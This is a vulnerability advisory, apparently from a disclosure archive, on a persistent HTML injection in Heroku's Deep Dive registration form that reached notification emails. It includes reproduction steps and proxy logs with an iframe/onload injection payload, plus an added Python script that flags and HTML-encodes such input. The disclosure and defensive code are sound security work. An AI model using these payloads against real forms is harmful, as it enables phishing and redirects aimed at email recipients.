Heroku API Deep Dive Script Insertion
Posted Jan 13, 2015
Authored by Benjamin Kunz Mejri, Vulnerability Laboratory | Site vulnerability-lab.com

Heroku API Deep Dive suffers from a mail related script insertion vulnerability.

tags | exploit
SHA-256 | 48ce32c2570d9291a426f6f4cf128d5da25797234ae385b612fd9ea3398f7d25

Document Title:
===============
Heroku API Deep Dive Bug Bounty #3 - Persistent UI Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1398

BugCrowd ID: 6b37910a3c5685b944a3ad65068aa251af47450953a06b8b13d74b35d708f6b0

Acknowledgement (Hall of Fame): https://bugcrowd.com/heroku/hall-of-fame


Release Date:
=============
2015-01-12


Vulnerability Laboratory ID (VL-ID):
====================================
1398


Common Vulnerability Scoring System:
====================================
2.5


Product & Service Introduction:
===============================
Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project.
Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers
without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and
designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps.
Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity.

Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service
lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling.
Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins.

(Copy of the Vendor Homepage: https://www.heroku.com/home )

We've been busy this fall at events meeting and talking to a lot of developers like you. We've had great discussions and
wanted to share the knowledge with the Heroku community. In this demo, we're going to address some of the most
frequently asked questions. And we want to hear from you so we'll leave the last 10 minutes for open Q&A. If you
think we should add something to the list, please let us know!

(Copy of the Vendor Homepage: http://lp2.heroku.com/Heroku_Deep_Dive_d )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the official Heroku API - Deep Dive web-application online service.


Vulnerability Disclosure Timeline:
==================================
2014-11-14: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-11-15: Vendor Notification (Heroku Security - Bug Bounty Program)
2014-12-06: Vendor Response/Feedback (Heroku Security - Bug Bounty Program)
2015-01-08: Vendor Fix/Patch (Heroku Developer Team - Reward: Bug Bounty)
2015-01-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Heroku
Product: Deep Dive (API) Web-Application 2015 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent mail encoding (HTML injection) web vulnerability has been discovered in the official Heroku API - Deep Dive web-application online service.
The application-side issue allows remote attackers to inject their own malicious persistent content into emails sent by the service.

The Heroku Deep Dive website has an input restriction mistake that affects the connected notification service. Remote attackers can
use the Deep Dive registration form to inject their own malicious payloads, which are then sent through the connected service of the Heroku website.
The missing restriction on the input fields affects the citrixonline.com GoToMeeting notification mail. The service sends the mail as configured, but the
input that feeds the request needs to be encoded before it is placed into the HTML mail body. Once the input fields and the POST request of the site are
restricted (validated and HTML-encoded), the payload no longer lands as markup in the mail produced by the mailing service.

The security risk of the persistent mail encoding web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System)
count of 2.5. Exploitation of the persistent vulnerability requires no privileged Heroku account but low or medium user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external sources
and persistent manipulation of the affected or connected module context. Note that most mail clients do not execute script in message bodies, so in
the mail context the practical impact is the injected markup itself (iframes, links, forms) used for phishing and redirects rather than script execution.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Invitation (heroku.com/Heroku_Deep_Dive_d)

Vulnerable Input(s):
[+] Firstname
[+] Lastname

Vulnerable Parameter(s):
[+] firstname & lastname

Affected Module(s):
[+] Heroku - Deep Dive


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers without a privileged application user account and
with low or medium user interaction. For security demonstration or to reproduce the vulnerability, follow the provided information or
steps below.

Manual steps to reproduce the vulnerability ...

1. Open the registration page of the new Heroku Deep Dive info service (http://lp2.heroku.com/Heroku_Deep_Dive_d)
2. Enter a script code payload in the firstname and lastname input fields and submit the form so that the notification mail is sent to the target mailbox
3. The injected script code arrives persistently in the mail context; it passes through because of the weak input restriction of the Heroku service (API)


PoC: Exploit

<td><font style="font-size: 14px; font-weight: bold" color="#000000" face="arial,verdana,helvetica">Join us on
Thursday, Nov 13, 2014 10:00 AM - 10:30 AM PST</font></td>
</tr>
<tr>
<td height="20"></td>
</tr>
<tr>
<td>
<table border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td><font style="font-size: 12px;" color="#000000" face="arial,verdana,helvetica">Dear "><[PERSISTENT INJECTED SCRIPT CODE VIA POST!]>,</font></td>
</tr>


--- PoC Session Logs [POST] ---
0:36:59.324[550ms][total 550ms] Status: 200[OK]
POST http://lp2.heroku.com/form/checkEmailAjax/account_id/36622/form_field_id/164298/tracker_id/42161190/field_id/36622_164298pi_36622_164298?param=admin%2540evolution-sec.com
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content size[161] Mime Type[text/html]
Request Header:
Host[lp2.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X_REQUESTED_WITH[XMLHttpRequest]
Referer[http://lp2.heroku.com/Heroku_Deep_Dive_d]
Content-Length[33]
Content-Type[text/plain; charset=UTF-8]
Cookie[pardot=gplsdc4i9roje436vho74bvag7; visitor_id36622=279785406]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST data:
param[admin%2540evolution-sec.com]
Response Header:
Date[Wed, 12 Nov 2014 23:37:06 GMT]
Server[Apache]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
X-Pardot-Rsp[28/206/241]
p3p[CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"]
Vary[Accept-Encoding,User-Agent]
Content-Encoding[gzip]
Content-Length[161]
Content-Type[text/html; charset=utf-8]
X-Pardot-LB[lb-s3]
X-Pardot-Route[public]
Connection[close]
--
0:37:19.698[986ms][total 986ms] Status: 302[Found]
POST http://lp2.heroku.com/Heroku_Deep_Dive_d
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content size[113] Mime Type[text/html]
Request Header:
Host[lp2.heroku.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://lp2.heroku.com/Heroku_Deep_Dive_d]
Cookie[pardot=gplsdc4i9roje436vho74bvag7; visitor_id36622=279785406]
Connection[keep-alive]
POST data:
36622_164294pi_36622_164294[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com
+onload%3Dalert%28%22VL]
36622_164296pi_36622_164296[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com
+onload%3Dalert%28%22VL%22%29+%3C]
36622_164302pi_36622_164302[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com
+onload%3Dalert%28%22VL%22%29+%3C]
36622_164298pi_36622_164298[admin%40evolution-sec.com]
36622_164304pi_36622_164304[015776363337]
36622_164300pi_36622_164300[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com+onload%3Dalert%28%22VL%22%29+%3C]
pi_extra_field[]
_utf8[%E2%98%83]
hiddenDependentFields[]
Response Header:
Date[Wed, 12 Nov 2014 23:37:26 GMT]
Server[Apache]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[http://lp2.heroku.com/deep_dive_TY]
p3p[CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"]
Vary[Accept-Encoding,User-Agent]
Content-Encoding[gzip]
Content-Length[113]
Content-Type[text/html; charset=UTF-8]
Set-Cookie[flash_message=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_success_message=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT;
path=/; secure
flash_error=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_created_object_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_access_message=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure
flash_warning=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; secure]
X-Pardot-LB[lb-s3]
X-Pardot-Route[public]
Connection[close]


Reference(s):
http://lp2.heroku.com/Heroku_Deep_Dive_d
http://lp2.heroku.com/form/checkEmailAjax/
http://lp2.heroku.com/deep_dive_TY


Solution - Fix & Patch:
=======================
The vulnerability is not located in the Citrix Online GoToMeeting service, even if it looks like it. The Heroku site does not encode, validate or restrict the input that gets
sent to the Citrix Online service for the mail notification. The vulnerable module is the Deep Dive invitation form, which is not securely implemented
(form: http://lp2.heroku.com/Heroku_Deep_Dive_d, thank-you page: http://lp2.heroku.com/deep_dive_TY). To fix the issue, HTML-encode the firstname and lastname
values before they are placed into the mail template and restrict both fields to the characters a name can contain, rejecting `<`, `>`, `"`, `'` and `&`.
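As an added example (not code from Heroku, Pardot or Citrix Online, and not part of the original advisory), the following Python script shows the two checks a practitioner would want here: it decodes the POST data captured in the session log above and flags the fields whose values carry HTML metacharacters, and it renders the mail greeting from the PoC once the way the vulnerable flow effectively did it (raw concatenation) and once with the value HTML-encoded. The greeting template, the function names and the inline copy of the captured POST data are assumptions made for this example.

```python
import html
import re
from urllib.parse import unquote_plus

# Constructed sample: a subset of the POST body from the advisory's session
# log, re-typed as the "name[urlencoded-value]" lines the proxy printed.
CAPTURED_POST_DATA = """\
36622_164296pi_36622_164296[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com+onload%3Dalert%28%22VL%22%29+%3C]
36622_164298pi_36622_164298[admin%40evolution-sec.com]
36622_164304pi_36622_164304[015776363337]
36622_164300pi_36622_164300[%22%3E%3Ciframe+src%3Dhttp://www.vulnerability-lab.com+onload%3Dalert%28%22VL%22%29+%3C]
_utf8[%E2%98%83]
"""

# Characters that must never reach an HTML mail body unencoded.
HTML_META = re.compile(r'[<>"\'&]')

# Assumed greeting template, modelled on the fragment shown in the PoC mail.
GREETING = '<td><font style="font-size: 12px;">Dear {name},</font></td>'


def parse_proxy_post_data(text):
    """Turn 'name[urlencoded-value]' log lines into a dict of decoded values."""
    fields = {}
    for line in text.splitlines():
        m = re.fullmatch(r'([^\[]+)\[(.*)\]', line.strip())
        if m:
            # unquote_plus also turns '+' into a space, as a browser form post does.
            fields[m.group(1)] = unquote_plus(m.group(2))
    return fields


def suspicious_fields(fields):
    """Names of fields whose decoded value contains HTML metacharacters."""
    return sorted(name for name, value in fields.items() if HTML_META.search(value))


def render_greeting_unsafe(first, last):
    """What the vulnerable flow effectively did: concatenate the raw name."""
    return GREETING.format(name=f"{first} {last}")


def render_greeting_safe(first, last):
    """Hardened variant: encode the value before it lands in an HTML context."""
    return GREETING.format(name=html.escape(f"{first} {last}", quote=True))


def contains_injected_markup(rendered):
    """True if rendering produced more tags than the template itself carries."""
    return rendered.count("<") > GREETING.count("<")


if __name__ == "__main__":
    fields = parse_proxy_post_data(CAPTURED_POST_DATA)
    for name in suspicious_fields(fields):
        print(f"suspicious field {name}: {fields[name]!r}")
    payload = fields["36622_164296pi_36622_164296"]
    print("unsafe:", render_greeting_unsafe(payload, "Doe"))
    print("safe:  ", render_greeting_safe(payload, "Doe"))
```

Run against the captured data, the script reports the two name fields as suspicious and shows that only the unencoded rendering grows an extra `<iframe>` tag; the encoded rendering keeps the payload as inert text in the greeting.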


Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the heroku deep dive service is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™


--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
